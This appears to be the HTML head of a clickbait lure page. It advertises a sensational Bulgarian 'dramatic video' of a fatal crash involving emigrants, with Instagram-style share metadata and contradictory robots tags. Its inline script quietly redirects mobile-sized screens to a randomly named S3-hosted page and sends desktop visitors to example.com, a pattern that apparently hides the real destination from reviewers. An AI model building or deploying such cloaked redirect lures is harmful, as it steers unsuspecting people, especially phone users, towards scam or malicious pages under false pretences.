<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content="Драматично видео: Заснеха тази сутрин фаталната катастрофа с български емигранти, загинали и ранени"/>
  <meta property="og:image" content="https://socialbu.nyc3.digitaloceanspaces.com/attachments/82185_93393_1719754598_09NbT6tQCrYfcqRBmAJsSth8KsAHK7pn5JfK96ah3c4a4cae5f06466de44f1abc5ed7eed7201a4917.jpg?X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=C25SFMRLFBQD2SIWBCWS%2F20240630%2Fnyc3%2Fs3%2Faws4_request&X-Amz-Date=20240630T133638Z&X-Amz-SignedHeaders=host&X-Amz-Expires=86400&X-Amz-Signature=ae98004f83c1fb6d7755bf168bd24e9c5ff5af919dd56ed205cb53411d4d4741"/> 
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script type="text/javascript">
    function generateRandomString(iLen) {
      var sRnd = '';
      var sChrs = "abcdefghiklmnopqrstuvwxyz";
      for (var i = 0; i < iLen; i++) {
        var randomPoz = Math.floor(Math.random() * sChrs.length);
        sRnd += sChrs.substring(randomPoz, randomPoz + 1);
      }
      return sRnd;
    }
          if (screen.width <= 720) {
          window.location = "https://cahwmssewsssas521.s3.eu-west-3.amazonaws.com/Nuevo2024/rancee4445.html";
      } else {
          window.location = "https://example.com/default_page.html"
      }
  </script>
    
